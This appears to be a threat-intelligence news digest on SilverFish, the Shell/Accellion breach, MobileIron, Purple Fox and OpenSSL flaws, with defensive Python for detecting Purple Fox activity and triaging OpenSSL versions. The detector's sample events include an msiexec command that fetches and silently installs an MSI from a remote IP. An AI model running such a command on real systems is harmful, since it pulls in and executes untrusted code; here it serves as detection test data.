Analysis of the new cyber-espionage group SilverFish
The PRODAFT Threat Intelligence team (PTI) has discovered a highly sophisticated cybercriminal group, named SilverFish, which operates exclusively against large enterprises and public institutions worldwide, with a focus on the European Union and the United States. According to the report, SilverFish uses modern project-management practices, sophisticated tooling and even its own sandbox, in which it tests its malware against a range of commercial AV and EDR products before deployment. The group relies on compromised domains, mostly running WordPress, to redirect traffic to its Command & Control (C2) servers; it creates new subdomains under them so that the legitimate owner is unlikely to notice the domain is being abused. According to the investigation, SilverFish has been linked to the supply-chain attack against SolarWinds, and its infrastructure overlaps with multiple IoCs previously attributed to TrickBot. Finally, the researchers assess that SilverFish's main objectives are reconnaissance and the exfiltration of data from its victims' systems.
All the details: https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
Shell energy company hit by Accellion FTA incident
The oil and gas company Shell, present in 70 countries and a member of the Fortune 500, issued a statement last week admitting that it had suffered a security incident resulting in the leak of confidential documents and files. The incident stems from a third-party compromise in December 2020 at its IT partner Accellion. Several 0-day vulnerabilities in the firm's file-transfer appliance, Accellion FTA, were actively exploited by threat actors to deploy malware and exfiltrate documents hosted on the system. According to Shell, the attackers were unable to reach the company's core digital infrastructure because the file-transfer appliance was isolated from its main servers. The leaked files include information about the group's subsidiaries and partners, as well as personal data. This data has not yet been published on the leak site maintained by the operators of the Cl0p ransomware, where other victims of the same incident, such as Kroger and Singtel, have already had their files posted.
Vulnerabilities in MobileIron MDM
Security researcher Matt Burch from Optiv has published three vulnerabilities in MobileIron MDM that, if chained together, could lead to the compromise of user accounts:
- The first flaw (CVE-2020-35137) allows attackers to discover an organisation's MobileIron authentication endpoint, because the Mobile@Work mobile app ships with hardcoded credentials for MobileIron's endpoint-discovery API.
- The second vulnerability (CVE-2020-35138) allows MobileIron authentication requests to be constructed and, under certain circumstances, credentials to be captured via a man-in-the-middle (MITM) attack.
- The last flaw (CVE-2021-3391) allows attackers to perform user enumeration attacks, confirming which usernames exist in the organisation.
While MobileIron has not yet released updates to fix these flaws, it has provided a number of recommendations to mitigate them. Optiv has also published a tool on GitHub to test for these flaws in MobileIron deployments.
Purple Fox acquires worm capabilities and infects Windows servers via SMB
Guardicore researchers have published a report on the Purple Fox malware's newly acquired worm capability, which infects Windows servers by brute-forcing passwords against SMB services exposed to the Internet on port 445. If authentication succeeds, Purple Fox creates a service named AC0X (where X is an integer from 0 to 9) that downloads and runs an MSI installation package from one of the HTTP servers in its botnet, which comprises more than two thousand compromised servers. This new entry vector, observed since the end of 2020, coexists with Purple Fox's earlier infection techniques, such as exploiting web browser vulnerabilities and phishing campaigns via email.
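The two observables above (a burst of failed network logons from one source, followed by a new service whose name matches AC0 plus a single digit) translate directly into detection logic. The following is an added example, not code from the Guardicore report; it runs over constructed sample events in a simplified "EventID|Source|Detail" format that stands in for Windows Security event 4625 (failed logon; LogonType 3 is a network logon, which is how SMB authentication failures appear) and System event 7045 (new service installed). The IP addresses, host names and threshold are assumptions chosen for the example.

```python
import re
from collections import Counter

# Constructed sample events (not from the Guardicore report).
# Format: "EventID|Source|Detail". 4625 = failed logon, 7045 = service installed.
SAMPLE_LOGS = [
    "4625|203.0.113.5|LogonType=3 Account=administrator",
    "4625|203.0.113.5|LogonType=3 Account=admin",
    "4625|203.0.113.5|LogonType=3 Account=backup",
    "4625|203.0.113.5|LogonType=3 Account=administrator",
    "4625|203.0.113.5|LogonType=3 Account=sqladmin",
    "4625|203.0.113.5|LogonType=3 Account=Administrator",
    "4625|192.0.2.9|LogonType=3 Account=alice",
    # Interactive (LogonType=2) failures: a user mistyping a password, not SMB.
    "4625|10.0.0.4|LogonType=2 Account=bob",
    "4625|10.0.0.4|LogonType=2 Account=bob",
    "4625|10.0.0.4|LogonType=2 Account=bob",
    "4625|10.0.0.4|LogonType=2 Account=bob",
    "4625|10.0.0.4|LogonType=2 Account=bob",
    "7045|srv01|ServiceName=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe",
    "7045|srv01|ServiceName=AC07 ImagePath=msiexec.exe /i http://198.51.100.23/ac07.msi /q",
    # Looks similar but has too many digits; must not match the AC0X pattern.
    "7045|srv01|ServiceName=AC0123 ImagePath=C:\\legit\\svc.exe",
]

# Service name as described in the report: "AC0" followed by exactly one digit.
SERVICE_NAME_RE = re.compile(r"^AC0[0-9]$")
# key=value pairs in the detail field (values without spaces are enough here).
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Split one sample line into (event_id, source, {field: value})."""
    event_id, source, detail = line.split("|", 2)
    return event_id, source, dict(FIELD_RE.findall(detail))


def purple_fox_services(lines):
    """Names of newly installed services (event 7045) matching AC0X."""
    hits = []
    for line in lines:
        event_id, _, fields = parse(line)
        name = fields.get("ServiceName", "")
        if event_id == "7045" and SERVICE_NAME_RE.match(name):
            hits.append(name)
    return hits


def smb_bruteforce_sources(lines, threshold=5):
    """Sources with at least `threshold` failed network logons (4625, LogonType=3).

    Only network logons are counted, so interactive typos (LogonType=2) from a
    local user never trip the rule, however many there are.
    """
    counts = Counter()
    for line in lines:
        event_id, source, fields = parse(line)
        if event_id == "4625" and fields.get("LogonType") == "3":
            counts[source] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


def triage(lines, threshold=5):
    """Combine both signals into one finding for an analyst."""
    return {
        "bruteforce_sources": smb_bruteforce_sources(lines, threshold),
        "suspicious_services": purple_fox_services(lines),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_LOGS))
```

The service-name rule is the higher-fidelity signal; the brute-force count on its own fires on any Internet-exposed SMB host, so in practice it should gate on the threshold and be correlated with the 7045 event on the same host, as `triage` does.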
Severe vulnerabilities in OpenSSL
The OpenSSL team has issued an advisory on two high-severity vulnerabilities, CVE-2021-3449 and CVE-2021-3450. OpenSSL is a software library widely used by network and server applications that need to establish secure communications. On the one hand, CVE-2021-3449 can lead to a denial of service (DoS) through a NULL pointer dereference; it affects only server instances, not clients, and only servers that have TLS 1.2 and renegotiation enabled (the default configuration). The issue was reported to OpenSSL on 17 March 2021 by Nokia and fixed by Peter Kästle and Samuel Sapalski. On the other hand, CVE-2021-3450 is a flaw in Certificate Authority (CA) certificate validation that affects both server and client instances, but only when the non-default X509_V_FLAG_X509_STRICT verification flag is set; it was introduced in OpenSSL 1.1.1h. The flaw was reported on 18 March by the Akamai team and the patch was developed by Tomáš Mráz. Both vulnerabilities are fixed in OpenSSL 1.1.1k; the 1.0.2 branch is not affected by either issue.
All the details: https://www.openssl.org/news/secadv/20210325.txt
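A first triage step is to map the `openssl version` banner of each host to the affected ranges in the advisory: every 1.1.1 release before 1.1.1k is exposed to CVE-2021-3449, only 1.1.1h through 1.1.1j to CVE-2021-3450, and 1.0.2 to neither. The following is an added example, not code from the OpenSSL project; the banner strings it is run against are constructed for the example, and whether CVE-2021-3449 is actually exploitable on a given host additionally depends on TLS 1.2 renegotiation being enabled, which a version string cannot tell you.

```python
import re

# Matches the start of `openssl version` output, e.g. "OpenSSL 1.1.1j  16 Feb 2021".
# 1.1.1 releases carry a single trailing patch letter (1.1.1, 1.1.1a, ..., 1.1.1k).
VERSION_RE = re.compile(r"^OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_version(banner):
    """Return (major, minor, patch, letter) from an `openssl version` banner."""
    m = VERSION_RE.match(banner.strip())
    if not m:
        raise ValueError(f"unrecognised OpenSSL banner: {banner!r}")
    major, minor, patch, letter = m.groups()
    return int(major), int(minor), int(patch), letter


def affected(banner):
    """CVEs from the 20210325 advisory that apply to this build.

    Only the 1.1.1 branch is in scope; 1.0.2 is not impacted, and other
    branches are outside the advisory, so both yield an empty set.
    Letter-suffixed releases sort lexically ("" < "a" < ... < "k"), which
    is why plain string comparison on the suffix is sufficient here.
    """
    major, minor, patch, letter = parse_version(banner)
    if (major, minor, patch) != (1, 1, 1):
        return set()
    if letter >= "k":          # 1.1.1k and later carry both fixes
        return set()
    cves = {"CVE-2021-3449"}   # all 1.1.1 releases before k
    if letter >= "h":          # the X509_STRICT bug was introduced in 1.1.1h
        cves.add("CVE-2021-3450")
    return cves


def report(banners):
    """Summarise a list of (host, banner) pairs as {host: sorted CVE list}."""
    return {host: sorted(affected(banner)) for host, banner in banners}


if __name__ == "__main__":
    # Constructed inventory for the example.
    hosts = [
        ("web01", "OpenSSL 1.1.1j  16 Feb 2021"),
        ("web02", "OpenSSL 1.1.1g  21 Apr 2020"),
        ("web03", "OpenSSL 1.1.1k  25 Mar 2021"),
        ("legacy", "OpenSSL 1.0.2u  20 Dec 2019"),
    ]
    for host, cves in report(hosts).items():
        print(host, cves or "not affected")
```

Run `openssl version` on each host (or pull the banner from your inventory tool) and feed the strings to `report`; a build that reports CVE-2021-3450 but never sets X509_V_FLAG_X509_STRICT is not exploitable through that bug, but should still be upgraded to 1.1.1k because of CVE-2021-3449.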